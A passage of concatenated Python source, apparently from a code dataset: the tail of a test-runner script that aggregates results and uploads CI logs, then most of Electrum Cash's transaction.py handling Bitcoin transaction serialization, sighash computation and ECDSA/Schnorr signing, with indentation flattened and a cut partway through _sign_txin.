target.append(test)
# randomize both because we don't want tests to have relatively
# dependency ordering and also because this can help avoid clumping
# longer running tests together
random.shuffle(target)
return target
def queue_jobs(tests):
for test in tests:
tests_queue.put(test)
all_tests = expand_suite(suite)
if args.debug_watchman:
args.concurrency = 1
elif len(all_tests) < args.concurrency:
args.concurrency = len(all_tests)
queue_jobs(all_tests)
if args.concurrency > 1:
for _ in range(args.concurrency):
t = threading.Thread(target=runner)
t.daemon = True
t.start()
# also send a termination sentinel
tests_queue.put("terminate")
# Wait for all tests to have been dispatched
tests_queue.join()
else:
# add a termination sentinel
tests_queue.put("terminate")
runner()
# Now pull out and aggregate the results
tests_run = 0
tests_failed = 0
tests_skipped = 0
while not results_queue.empty():
res = results_queue.get()
tests_run = tests_run + res.testsRun
tests_failed = tests_failed + len(res.errors) + len(res.failures)
tests_skipped = tests_skipped + len(res.skipped)
if not args.testpilot_json:
print(
"Ran %d, failed %d, skipped %d, concurrency %d"
% (tests_run, tests_failed, tests_skipped, args.concurrency)
)
if "APPVEYOR" in os.environ:
logdir = "logs7" if args.win7 else "logs"
logzip = "%s.zip" % logdir
shutil.copytree(tempfile.tempdir, logdir)
subprocess.call(["7z", "a", logzip, logdir])
subprocess.call(["appveyor", "PushArtifact", logzip])
if "CIRCLE_ARTIFACTS" in os.environ:
print("Creating %s/logs.zip" % os.environ["CIRCLE_ARTIFACTS"])
subprocess.call(
[
"zip",
"-q",
"-r",
"%s/logs.zip" % os.environ["CIRCLE_ARTIFACTS"],
temp_dir.get_dir(),
]
)
if tests_failed or (tests_run == 0):
if args.keep_if_fail:
temp_dir.set_keep(True)
if args.testpilot_json:
# When outputting JSON, our return code indicates if we successfully
# produced output or not, not whether the tests passed. The JSON
# output contains the detailed test pass/failure information.
sys.exit(0)
sys.exit(1)
|
transaction.py
|
#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Note: The deserialization code originally comes from ABE.
from .util import print_error, profiler
from .caches import ExpiringCache
from .bitcoin import *
from .address import (PublicKey, Address, Script, ScriptOutput, hash160,
UnknownAddress, OpCodes as opcodes,
P2PKH_prefix, P2PKH_suffix, P2SH_prefix, P2SH_suffix)
from . import schnorr
from . import util
import struct
import warnings
#
# Workalike python implementation of Bitcoin's CDataStream class.
#
from .keystore import xpubkey_to_address, xpubkey_to_pubkey
NO_SIGNATURE = 'ff'
class SerializationError(Exception):
""" Thrown when there's a problem deserializing or serializing """
class InputValueMissing(ValueError):
""" thrown when the value of an input is needed but not present """
class BCDataStream(object):
def __init__(self):
self.input = None
self.read_cursor = 0
def clear(self):
self.input = None
self.read_cursor = 0
def write(self, _bytes): # Initialize with string of _bytes
if self.input is None:
self.input = bytearray(_bytes)
else:
self.input += bytearray(_bytes)
def read_string(self, encoding='ascii'):
# Strings are encoded depending on length:
# 0 to 252 : 1-byte-length followed by bytes (if any)
# 253 to 65,535 : byte'253' 2-byte-length followed by bytes
# 65,536 to 4,294,967,295 : byte '254' 4-byte-length followed by bytes
# ... and the Bitcoin client is coded to understand:
# greater than 4,294,967,295 : byte '255' 8-byte-length followed by bytes of string
# ... but I don't think it actually handles any strings that big.
if self.input is None:
raise SerializationError("call write(bytes) before trying to deserialize")
length = self.read_compact_size()
return self.read_bytes(length).decode(encoding)
def write_string(self, string, encoding='ascii'):
string = to_bytes(string, encoding)
# Length-encoded as with read-string
self.write_compact_size(len(string))
self.write(string)
def read_bytes(self, length):
try:
result = self.input[self.read_cursor:self.read_cursor+length]
self.read_cursor += length
return result
except IndexError:
raise SerializationError("attempt to read past end of buffer")
return ''
def can_read_more(self) -> bool:
if not self.input:
return False
return self.read_cursor < len(self.input)
def read_boolean(self): return self.read_bytes(1)[0] != chr(0)
def read_int16(self): return self._read_num('<h')
def read_uint16(self): return self._read_num('<H')
def read_int32(self): return self._read_num('<i')
def read_uint32(self): return self._read_num('<I')
def read_int64(self): return self._read_num('<q')
def read_uint64(self): return self._read_num('<Q')
def write_boolean(self, val): return self.write(chr(1) if val else chr(0))
def write_int16(self, val): return self._write_num('<h', val)
def write_uint16(self, val): return self._write_num('<H', val)
def write_int32(self, val): return self._write_num('<i', val)
def write_uint32(self, val): return self._write_num('<I', val)
def write_int64(self, val): return self._write_num('<q', val)
def write_uint64(self, val): return self._write_num('<Q', val)
def read_compact_size(self):
try:
size = self.input[self.read_cursor]
self.read_cursor += 1
if size == 253:
size = self._read_num('<H')
elif size == 254:
size = self._read_num('<I')
elif size == 255:
size = self._read_num('<Q')
return size
except IndexError:
raise SerializationError("attempt to read past end of buffer")
def write_compact_size(self, size):
if size < 0:
raise SerializationError("attempt to write size < 0")
elif size < 253:
self.write(bytes([size]))
elif size < 2**16:
self.write(b'\xfd')
self._write_num('<H', size)
elif size < 2**32:
self.write(b'\xfe')
self._write_num('<I', size)
elif size < 2**64:
self.write(b'\xff')
self._write_num('<Q', size)
def _read_num(self, format):
try:
(i,) = struct.unpack_from(format, self.input, self.read_cursor)
self.read_cursor += struct.calcsize(format)
except Exception as e:
raise SerializationError(e)
return i
def _write_num(self, format, num):
s = struct.pack(format, num)
self.write(s)
# This function comes from bitcointools, bct-LICENSE.txt.
def long_hex(bytes):
return bytes.encode('hex_codec')
# This function comes from bitcointools, bct-LICENSE.txt.
def short_hex(bytes):
t = bytes.encode('hex_codec')
if len(t) < 11:
return t
return t[0:4]+"..."+t[-4:]
def match_decoded(decoded, to_match):
if len(decoded) != len(to_match):
return False;
for i in range(len(decoded)):
if to_match[i] == opcodes.OP_PUSHDATA4 and decoded[i][0] <= opcodes.OP_PUSHDATA4 and decoded[i][0]>0:
continue # Opcodes below OP_PUSHDATA4 all just push data onto stack, and are equivalent.
if to_match[i] != decoded[i][0]:
return False
return True
def parse_sig(x_sig):
return [None if x == NO_SIGNATURE else x for x in x_sig]
def safe_parse_pubkey(x):
try:
return xpubkey_to_pubkey(x)
except:
return x
def parse_scriptSig(d, _bytes):
try:
decoded = Script.get_ops(_bytes)
except Exception as e:
# coinbase transactions raise an exception
print_error("cannot find address in input script", bh2u(_bytes))
return
match = [ opcodes.OP_PUSHDATA4 ]
if match_decoded(decoded, match):
item = decoded[0][1]
# payto_pubkey
d['type'] = 'p2pk'
d['signatures'] = [bh2u(item)]
d['num_sig'] = 1
d['x_pubkeys'] = ["(pubkey)"]
d['pubkeys'] = ["(pubkey)"]
return
# non-generated TxIn transactions push a signature
# (seventy-something bytes) and then their public key
# (65 bytes) onto the stack:
match = [ opcodes.OP_PUSHDATA4, opcodes.OP_PUSHDATA4 ]
if match_decoded(decoded, match):
sig = bh2u(decoded[0][1])
x_pubkey = bh2u(decoded[1][1])
try:
signatures = parse_sig([sig])
pubkey, address = xpubkey_to_address(x_pubkey)
except:
print_error("cannot find address in input script", bh2u(_bytes))
return
d['type'] = 'p2pkh'
d['signatures'] = signatures
d['x_pubkeys'] = [x_pubkey]
d['num_sig'] = 1
d['pubkeys'] = [pubkey]
d['address'] = address
return
# p2sh transaction, m of n
match = [ opcodes.OP_0 ] + [ opcodes.OP_PUSHDATA4 ] * (len(decoded) - 1)
if not match_decoded(decoded, match):
print_error("cannot find address in input script", bh2u(_bytes))
return
x_sig = [bh2u(x[1]) for x in decoded[1:-1]]
m, n, x_pubkeys, pubkeys, redeemScript = parse_redeemScript(decoded[-1][1])
# write result in d
d['type'] = 'p2sh'
d['num_sig'] = m
d['signatures'] = parse_sig(x_sig)
d['x_pubkeys'] = x_pubkeys
d['pubkeys'] = pubkeys
d['redeemScript'] = redeemScript
d['address'] = Address.from_P2SH_hash(hash160(redeemScript))
def parse_redeemScript(s):
dec2 = Script.get_ops(s)
# the following throw exception when redeemscript has one or zero opcodes
m = dec2[0][0] - opcodes.OP_1 + 1
n = dec2[-2][0] - opcodes.OP_1 + 1
op_m = opcodes.OP_1 + m - 1
op_n = opcodes.OP_1 + n - 1
match_multisig = [ op_m ] + [opcodes.OP_PUSHDATA4]*n + [ op_n, opcodes.OP_CHECKMULTISIG ]
if not match_decoded(dec2, match_multisig):
# causes exception in caller when mismatched
print_error("cannot find address in input script", bh2u(s))
return
x_pubkeys = [bh2u(x[1]) for x in dec2[1:-2]]
pubkeys = [safe_parse_pubkey(x) for x in x_pubkeys]
redeemScript = Script.multisig_script(m, [bytes.fromhex(p)
for p in pubkeys])
return m, n, x_pubkeys, pubkeys, redeemScript
def get_address_from_output_script(_bytes):
scriptlen = len(_bytes)
if scriptlen == 23 and _bytes.startswith(P2SH_prefix) and _bytes.endswith(P2SH_suffix):
# Pay-to-script-hash
return TYPE_ADDRESS, Address.from_P2SH_hash(_bytes[2:22])
if scriptlen == 25 and _bytes.startswith(P2PKH_prefix) and _bytes.endswith(P2PKH_suffix):
# Pay-to-pubkey-hash
return TYPE_ADDRESS, Address.from_P2PKH_hash(_bytes[3:23])
if scriptlen == 35 and _bytes[0] == 33 and _bytes[1] in (2,3) and _bytes[34] == opcodes.OP_CHECKSIG:
# Pay-to-pubkey (compressed)
return TYPE_PUBKEY, PublicKey.from_pubkey(_bytes[1:34])
if scriptlen == 67 and _bytes[0] == 65 and _bytes[1] == 4 and _bytes[66] == opcodes.OP_CHECKSIG:
# Pay-to-pubkey (uncompressed)
return TYPE_PUBKEY, PublicKey.from_pubkey(_bytes[1:66])
# note: we don't recognize bare multisigs.
return TYPE_SCRIPT, ScriptOutput.protocol_factory(bytes(_bytes))
def parse_input(vds):
d = {}
prevout_hash = hash_encode(vds.read_bytes(32))
prevout_n = vds.read_uint32()
scriptSig = vds.read_bytes(vds.read_compact_size())
sequence = vds.read_uint32()
d['prevout_hash'] = prevout_hash
d['prevout_n'] = prevout_n
d['sequence'] = sequence
d['address'] = UnknownAddress()
if prevout_hash == '00'*32:
d['type'] = 'coinbase'
d['scriptSig'] = bh2u(scriptSig)
else:
d['x_pubkeys'] = []
d['pubkeys'] = []
d['signatures'] = {}
d['address'] = None
d['type'] = 'unknown'
d['num_sig'] = 0
d['scriptSig'] = bh2u(scriptSig)
try:
parse_scriptSig(d, scriptSig)
except Exception as e:
print_error('{}: Failed to parse tx input {}:{}, probably a p2sh (non multisig?). Exception was: {}'.format(__name__, prevout_hash, prevout_n, repr(e)))
# that whole heuristic codepath is fragile; just ignore it when it dies.
# failing tx examples:
# 1c671eb25a20aaff28b2fa4254003c201155b54c73ac7cf9c309d835deed85ee
# 08e1026eaf044127d7103415570afd564dfac3131d7a5e4b645f591cd349bb2c
# override these once more just to make sure
d['address'] = UnknownAddress()
d['type'] = 'unknown'
if not Transaction.is_txin_complete(d):
del d['scriptSig']
d['value'] = vds.read_uint64()
return d
def parse_output(vds, i):
d = {}
d['value'] = vds.read_int64()
scriptPubKey = vds.read_bytes(vds.read_compact_size())
d['type'], d['address'] = get_address_from_output_script(scriptPubKey)
d['scriptPubKey'] = bh2u(scriptPubKey)
d['prevout_n'] = i
return d
def deserialize(raw):
vds = BCDataStream()
vds.write(bfh(raw))
d = {}
start = vds.read_cursor
d['version'] = vds.read_int32()
n_vin = vds.read_compact_size()
d['inputs'] = [parse_input(vds) for i in range(n_vin)]
n_vout = vds.read_compact_size()
d['outputs'] = [parse_output(vds, i) for i in range(n_vout)]
d['lockTime'] = vds.read_uint32()
if vds.can_read_more():
raise SerializationError('extra junk at the end')
return d
# pay & redeem scripts
def multisig_script(public_keys, m):
n = len(public_keys)
assert n <= 15
assert m <= n
op_m = format(opcodes.OP_1 + m - 1, 'x')
op_n = format(opcodes.OP_1 + n - 1, 'x')
keylist = [op_push(len(k)//2) + k for k in public_keys]
return op_m + ''.join(keylist) + op_n + 'ae'
class Transaction:
SIGHASH_FORKID = 0x40 # do not use this; deprecated
FORKID = 0x000000 # do not use this; deprecated
def __str__(self):
if self.raw is None:
self.raw = self.serialize()
return self.raw
def __init__(self, raw, sign_schnorr=False):
if raw is None:
self.raw = None
elif isinstance(raw, str):
self.raw = raw.strip() if raw else None
elif isinstance(raw, dict):
self.raw = raw['hex']
else:
raise BaseException("cannot initialize transaction", raw)
self._inputs = None
self._outputs = None
self.locktime = 0
self.version = 1
self._sign_schnorr = sign_schnorr
# attribute used by HW wallets to tell the hw keystore about any outputs
# in the tx that are to self (change), etc. See wallet.py add_hw_info
# which writes to this dict and the various hw wallet plugins which
# read this dict.
self.output_info = dict()
# Ephemeral meta-data used internally to keep track of interesting
# things. This is currently written-to by coinchooser to tell UI code
# about 'dust_to_fee', which is change that's too small to go to change
# outputs (below dust threshold) and needed to go to the fee.
#
# It is also used to store the 'fetched_inputs' which are asynchronously
# retrieved inputs (by retrieving prevout_hash tx's), see
#`fetch_input_data`.
#
# Values in this dict are advisory only and may or may not always be
# there!
self.ephemeral = dict()
def set_sign_schnorr(self, b):
self._sign_schnorr = b
def update(self, raw):
self.raw = raw
self._inputs = None
self.deserialize()
def inputs(self):
if self._inputs is None:
self.deserialize()
return self._inputs
def outputs(self):
if self._outputs is None:
self.deserialize()
return self._outputs
@classmethod
def get_sorted_pubkeys(self, txin):
# sort pubkeys and x_pubkeys, using the order of pubkeys
# Note: this function is CRITICAL to get the correct order of pubkeys in
# multisignatures; avoid changing.
x_pubkeys = txin['x_pubkeys']
pubkeys = txin.get('pubkeys')
if pubkeys is None:
pubkeys = [xpubkey_to_pubkey(x) for x in x_pubkeys]
pubkeys, x_pubkeys = zip(*sorted(zip(pubkeys, x_pubkeys)))
txin['pubkeys'] = pubkeys = list(pubkeys)
txin['x_pubkeys'] = x_pubkeys = list(x_pubkeys)
return pubkeys, x_pubkeys
def update_signatures(self, signatures):
"""Add new signatures to a transaction
`signatures` is expected to be a list of hex encoded sig strings with
*no* sighash byte at the end (implicitly always 0x41 (SIGHASH_FORKID|SIGHASH_ALL);
will be added by this function).
signatures[i] is intended for self._inputs[i].
The signature will be matched with the appropriate pubkey automatically
in the case of multisignature wallets.
This function is used by the Trezor, KeepKey, etc to update the
transaction with signatures form the device.
Note this function supports both Schnorr and ECDSA signatures, but as
yet no hardware wallets are signing Schnorr.
"""
if self.is_complete():
return
if not isinstance(signatures, (tuple, list)):
raise Exception('API changed: update_signatures expects a list.')
if len(self.inputs()) != len(signatures):
raise Exception('expected {} signatures; got {}'.format(len(self.inputs()), len(signatures)))
for i, txin in enumerate(self.inputs()):
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
sig = signatures[i]
if not isinstance(sig, str):
raise ValueError("sig was bytes, expected string")
# sig_final is the signature with the sighashbyte at the end (0x41)
sig_final = sig + '41'
if sig_final in txin.get('signatures'):
# skip if we already have this signature
continue
pre_hash = Hash(bfh(self.serialize_preimage(i)))
sig_bytes = bfh(sig)
added = False
reason = []
for j, pubkey in enumerate(pubkeys):
# see which pubkey matches this sig (in non-multisig only 1 pubkey, in multisig may be multiple pubkeys)
if self.verify_signature(bfh(pubkey), sig_bytes, pre_hash, reason):
print_error("adding sig", i, j, pubkey, sig_final)
self._inputs[i]['signatures'][j] = sig_final
added = True
if not added:
resn = ', '.join(reversed(reason)) if reason else ''
print_error("failed to add signature {} for any pubkey for reason(s): '{}' ; pubkey(s) / sig / pre_hash = ".format(i, resn),
pubkeys, '/', sig, '/', bh2u(pre_hash))
# redo raw
self.raw = self.serialize()
def is_schnorr_signed(self, input_idx):
''' Return True IFF any of the signatures for a particular input
are Schnorr signatures (Schnorr signatures are always 64 bytes + 1) '''
if (isinstance(self._inputs, (list, tuple))
and input_idx < len(self._inputs)
and self._inputs[input_idx]):
# Schnorr sigs are always 64 bytes. However the sig has a hash byte
# at the end, so that's 65. Plus we are hex encoded, so 65*2=130
return any(isinstance(sig, (str, bytes)) and len(sig) == 130
for sig in self._inputs[input_idx].get('signatures', []))
return False
def deserialize(self):
if self.raw is None:
return
if self._inputs is not None:
return
d = deserialize(self.raw)
self.invalidate_common_sighash_cache()
self._inputs = d['inputs']
self._outputs = [(x['type'], x['address'], x['value']) for x in d['outputs']]
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in self._outputs)
self.locktime = d['lockTime']
self.version = d['version']
return d
@classmethod
def from_io(klass, inputs, outputs, locktime=0, sign_schnorr=False):
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in outputs)
self = klass(None)
self._inputs = inputs
self._outputs = outputs.copy()
self.locktime = locktime
self.set_sign_schnorr(sign_schnorr)
return self
@classmethod
def pay_script(self, output):
return output.to_script().hex()
@classmethod
def estimate_pubkey_size_from_x_pubkey(cls, x_pubkey):
try:
if x_pubkey[0:2] in ['02', '03']: # compressed pubkey
return 0x21
elif x_pubkey[0:2] == '04': # uncompressed pubkey
return 0x41
elif x_pubkey[0:2] == 'ff': # bip32 extended pubkey
return 0x21
elif x_pubkey[0:2] == 'fe': # old electrum extended pubkey
return 0x41
except Exception as e:
pass
return 0x21 # just guess it is compressed
@classmethod
def estimate_pubkey_size_for_txin(cls, txin):
pubkeys = txin.get('pubkeys', [])
x_pubkeys = txin.get('x_pubkeys', [])
if pubkeys and len(pubkeys) > 0:
return cls.estimate_pubkey_size_from_x_pubkey(pubkeys[0])
elif x_pubkeys and len(x_pubkeys) > 0:
return cls.estimate_pubkey_size_from_x_pubkey(x_pubkeys[0])
else:
return 0x21 # just guess it is compressed
@classmethod
def get_siglist(self, txin, estimate_size=False, sign_schnorr=False):
# if we have enough signatures, we use the actual pubkeys
# otherwise, use extended pubkeys (with bip32 derivation)
num_sig = txin.get('num_sig', 1)
if estimate_size:
pubkey_size = self.estimate_pubkey_size_for_txin(txin)
pk_list = ["00" * pubkey_size] * len(txin.get('x_pubkeys', [None]))
# we assume that signature will be 0x48 bytes long if ECDSA, 0x41 if Schnorr
if sign_schnorr:
siglen = 0x41
else:
siglen = 0x48
sig_list = [ "00" * siglen ] * num_sig
else:
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
x_signatures = txin['signatures']
signatures = list(filter(None, x_signatures))
is_complete = len(signatures) == num_sig
if is_complete:
pk_list = pubkeys
sig_list = signatures
else:
pk_list = x_pubkeys
sig_list = [sig if sig else NO_SIGNATURE for sig in x_signatures]
return pk_list, sig_list
@classmethod
def input_script(self, txin, estimate_size=False, sign_schnorr=False):
# For already-complete transactions, scriptSig will be set and we prefer
# to use it verbatim in order to get an exact reproduction (including
# malleated push opcodes, etc.).
scriptSig = txin.get('scriptSig', None)
if scriptSig is not None:
return scriptSig
# For partially-signed inputs, or freshly signed transactions, the
# scriptSig will be missing and so we construct it from pieces.
_type = txin['type']
if _type == 'coinbase':
raise RuntimeError('Attempted to serialize coinbase with missing scriptSig')
pubkeys, sig_list = self.get_siglist(txin, estimate_size, sign_schnorr=sign_schnorr)
script = ''.join(push_script(x) for x in sig_list)
if _type == 'p2pk':
pass
elif _type == 'p2sh':
# put op_0 before script
script = '00' + script
redeem_script = multisig_script(pubkeys, txin['num_sig'])
script += push_script(redeem_script)
elif _type == 'p2pkh':
script += push_script(pubkeys[0])
elif _type == 'unknown':
raise RuntimeError('Cannot serialize unknown input with missing scriptSig')
return script
@classmethod
def is_txin_complete(cls, txin):
if txin['type'] == 'coinbase':
return True
num_sig = txin.get('num_sig', 1)
if num_sig == 0:
return True
x_signatures = txin['signatures']
signatures = list(filter(None, x_signatures))
return len(signatures) == num_sig
@classmethod
def get_preimage_script(self, txin):
_type = txin['type']
if _type == 'p2pkh':
return txin['address'].to_script().hex()
elif _type == 'p2sh':
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
return multisig_script(pubkeys, txin['num_sig'])
elif _type == 'p2pk':
pubkey = txin['pubkeys'][0]
return public_key_to_p2pk_script(pubkey)
elif _type == 'unknown':
# this approach enables most P2SH smart contracts (but take care if using OP_CODESEPARATOR)
return txin['scriptCode']
else:
raise RuntimeError('Unknown txin type', _type)
@classmethod
def serialize_outpoint(self, txin):
return bh2u(bfh(txin['prevout_hash'])[::-1]) + int_to_hex(txin['prevout_n'], 4)
@classmethod
def serialize_input(self, txin, script, estimate_size=False):
# Prev hash and index
s = self.serialize_outpoint(txin)
# Script length, script, sequence
s += var_int(len(script)//2)
s += script
s += int_to_hex(txin.get('sequence', 0xffffffff - 1), 4)
# offline signing needs to know the input value
if ('value' in txin
and txin.get('scriptSig') is None
and not (estimate_size or self.is_txin_complete(txin))):
s += int_to_hex(txin['value'], 8)
return s
def BIP_LI01_sort(self):
# See https://github.com/kristovatlas/rfc/blob/master/bips/bip-li01.mediawiki
self._inputs.sort(key = lambda i: (i['prevout_hash'], i['prevout_n']))
self._outputs.sort(key = lambda o: (o[2], self.pay_script(o[1])))
def serialize_output(self, output):
output_type, addr, amount = output
s = int_to_hex(amount, 8)
script = self.pay_script(addr)
s += var_int(len(script)//2)
s += script
return s
@classmethod
def nHashType(cls):
'''Hash type in hex.'''
warnings.warn("warning: deprecated tx.nHashType()", FutureWarning, stacklevel=2)
return 0x01 | (cls.SIGHASH_FORKID + (cls.FORKID << 8))
def invalidate_common_sighash_cache(self):
''' Call this to invalidate the cached common sighash (computed by
`calc_common_sighash` below).
This is function is for advanced usage of this class where the caller
has mutated the transaction after computing its signatures and would
like to explicitly delete the cached common sighash. See
`calc_common_sighash` below. '''
try: del self._cached_sighash_tup
except AttributeError: pass
def calc_common_sighash(self, use_cache=False):
""" Calculate the common sighash components that are used by
transaction signatures. If `use_cache` enabled then this will return
already-computed values from the `._cached_sighash_tup` attribute, or
compute them if necessary (and then store).
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
Returns three 32-long bytes objects: (hashPrevouts, hashSequence, hashOutputs).
Warning: If you modify non-signature parts of the transaction
afterwards, this cache will be wrong! """
inputs = self.inputs()
outputs = self.outputs()
meta = (len(inputs), len(outputs))
if use_cache:
try:
cmeta, res = self._cached_sighash_tup
except AttributeError:
pass
else:
# minimal heuristic check to detect bad cached value
if cmeta == meta:
# cache hit and heuristic check ok
return res
else:
del cmeta, res, self._cached_sighash_tup
hashPrevouts = Hash(bfh(''.join(self.serialize_outpoint(txin) for txin in inputs)))
hashSequence = Hash(bfh(''.join(int_to_hex(txin.get('sequence', 0xffffffff - 1), 4) for txin in inputs)))
hashOutputs = Hash(bfh(''.join(self.serialize_output(o) for o in outputs)))
res = hashPrevouts, hashSequence, hashOutputs
# cach resulting value, along with some minimal metadata to defensively
# program against cache invalidation (due to class mutation).
self._cached_sighash_tup = meta, res
return res
def serialize_preimage(self, i, nHashType=0x00000041, use_cache = False):
""" See `.calc_common_sighash` for explanation of use_cache feature """
if (nHashType & 0xff) != 0x41:
raise ValueError("other hashtypes not supported; submit a PR to fix this!")
nVersion = int_to_hex(self.version, 4)
nHashType = int_to_hex(nHashType, 4)
nLocktime = int_to_hex(self.locktime, 4)
txin = self.inputs()[i]
outpoint = self.serialize_outpoint(txin)
preimage_script = self.get_preimage_script(txin)
scriptCode = var_int(len(preimage_script) // 2) + preimage_script
try:
amount = int_to_hex(txin['value'], 8)
except KeyError:
raise InputValueMissing
nSequence = int_to_hex(txin.get('sequence', 0xffffffff - 1), 4)
hashPrevouts, hashSequence, hashOutputs = self.calc_common_sighash(use_cache = use_cache)
preimage = nVersion + bh2u(hashPrevouts) + bh2u(hashSequence) + outpoint + scriptCode + amount + nSequence + bh2u(hashOutputs) + nLocktime + nHashType
return preimage
def serialize(self, estimate_size=False):
nVersion = int_to_hex(self.version, 4)
nLocktime = int_to_hex(self.locktime, 4)
inputs = self.inputs()
outputs = self.outputs()
txins = var_int(len(inputs)) + ''.join(self.serialize_input(txin, self.input_script(txin, estimate_size, self._sign_schnorr), estimate_size) for txin in inputs)
txouts = var_int(len(outputs)) + ''.join(self.serialize_output(o) for o in outputs)
return nVersion + txins + txouts + nLocktime
def hash(self):
warnings.warn("warning: deprecated tx.hash()", FutureWarning, stacklevel=2)
return self.txid()
def txid(self):
if not self.is_complete():
return None
ser = self.serialize()
return self._txid(ser)
def txid_fast(self):
''' Returns the txid by immediately calculating it from self.raw,
which is faster than calling txid() which does a full re-serialize
each time. Note this should only be used for tx's that you KNOW are
complete and that don't contain our funny serialization hacks.
(The is_complete check is also not performed here because that
potentially can lead to unwanted tx deserialization). '''
if self.raw:
return self._txid(self.raw)
return self.txid()
@staticmethod
def _txid(raw_hex : str) -> str:
return bh2u(Hash(bfh(raw_hex))[::-1])
def add_inputs(self, inputs):
self._inputs.extend(inputs)
self.raw = None
def add_outputs(self, outputs):
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in outputs)
self._outputs.extend(outputs)
self.raw = None
def input_value(self):
''' Will return the sum of all input values, if the input values
are known (may consult self.fetched_inputs() to get a better idea of
possible input values). Will raise InputValueMissing if input values
are missing. '''
try:
return sum(x['value'] for x in (self.fetched_inputs() or self.inputs()))
except (KeyError, TypeError, ValueError) as e:
raise InputValueMissing from e
def output_value(self):
return sum(val for tp, addr, val in self.outputs())
def get_fee(self):
''' Try and calculate the fee based on the input data, and returns it as
fixoshis (int). Can raise InputValueMissing on tx's where fee data is
missing, so client code should catch that. '''
# first, check if coinbase; coinbase tx always has 0 fee
if self.inputs() and self._inputs[0].get('type') == 'coinbase':
return 0
# otherwise just sum up all values - may raise InputValueMissing
return self.input_value() - self.output_value()
@profiler
def estimated_size(self):
'''Return an estimated tx size in bytes.'''
return (len(self.serialize(True)) // 2 if not self.is_complete() or self.raw is None
else len(self.raw) // 2) # ASCII hex string
@classmethod
def estimated_input_size(self, txin, sign_schnorr=False):
'''Return an estimated of serialized input size in bytes.'''
script = self.input_script(txin, True, sign_schnorr=sign_schnorr)
return len(self.serialize_input(txin, script, True)) // 2 # ASCII hex string
def signature_count(self):
r = 0
s = 0
for txin in self.inputs():
if txin['type'] == 'coinbase':
continue
signatures = list(filter(None, txin.get('signatures',[])))
s += len(signatures)
r += txin.get('num_sig', -1)
return s, r
def is_complete(self):
s, r = self.signature_count()
return r == s
@staticmethod
def verify_signature(pubkey, sig, msghash, reason=None):
''' Given a pubkey (bytes), signature (bytes -- without sighash byte),
and a sha256d message digest, returns True iff the signature is good
for the given public key, False otherwise. Does not raise normally
unless given bad or garbage arguments.
Optional arg 'reason' should be a list which will have a string pushed
at the front (failure reason) on False return. '''
if (any(not arg or not isinstance(arg, bytes) for arg in (pubkey, sig, msghash))
or len(msghash) != 32):
raise ValueError('bad arguments to verify_signature')
if len(sig) == 64:
# Schnorr signatures are always exactly 64 bytes
return schnorr.verify(pubkey, sig, msghash)
else:
from ecdsa import BadSignatureError, BadDigestError
from ecdsa.der import UnexpectedDER
# ECDSA signature
try:
pubkey_point = ser_to_point(pubkey)
vk = MyVerifyingKey.from_public_point(pubkey_point, curve=SECP256k1)
if vk.verify_digest(sig, msghash, sigdecode = ecdsa.util.sigdecode_der):
return True
except (AssertionError, ValueError, TypeError,
BadSignatureError, BadDigestError, UnexpectedDER) as e:
# ser_to_point will fail if pubkey is off-curve, infinity, or garbage.
# verify_digest may also raise BadDigestError and BadSignatureError
if isinstance(reason, list):
reason.insert(0, repr(e))
except BaseException as e:
print_error("[Transaction.verify_signature] unexpected exception", repr(e))
if isinstance(reason, list):
reason.insert(0, repr(e))
return False
@staticmethod
def _ecdsa_sign(sec, pre_hash):
pkey = regenerate_key(sec)
secexp = pkey.secret
private_key = MySigningKey.from_secret_exponent(secexp, curve = SECP256k1)
public_key = private_key.get_verifying_key()
sig = private_key.sign_digest_deterministic(pre_hash, hashfunc=hashlib.sha256, sigencode = ecdsa.util.sigencode_der)
assert public_key.verify_digest(sig, pre_hash, sigdecode = ecdsa.util.sigdecode_der)
return sig
@staticmethod
def _schnorr_sign(pubkey, sec, pre_hash):
pubkey = bytes.fromhex(pubkey)
sig = schnorr.sign(sec, pre_hash)
assert schnorr.verify(pubkey, sig, pre_hash) # verify what we just signed
return sig
def sign(self, keypairs, *, use_cache=False):
for i, txin in enumerate(self.inputs()):
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
for j, (pubkey, x_pubkey) in enumerate(zip(pubkeys, x_pubkeys)):
if self.is_txin_complete(txin):
# txin is complete
break
if pubkey in keypairs:
_pubkey = pubkey
kname = 'pubkey'
elif x_pubkey in keypairs:
_pubkey = x_pubkey
kname = 'x_pubkey'
else:
continue
print_error(f"adding signature for input#{i} sig#{j}; {kname}: {_pubkey} schnorr: {self._sign_schnorr}")
sec, compressed = keypairs.get(_pubkey)
self._sign_txin(i, j, sec, compressed, use_cache=use_cache)
print_error("is_complete", self.is_complete())
self.raw = self.serialize()
def _sign_txin(self, i, j, sec, compressed, *, use_cache=False):
'''Note: precondition is self._inputs is valid (ie: tx is already deserialized)'''
pubkey = public_key_from_private_key(sec, compressed)
# add signature
nHashType = 0x00000041 # hardcoded, perhaps should be taken from unsigned input dict
pre_hash = Hash(bfh(self.serialize_preimage(i, nHashType, use_cache=use_cache)))
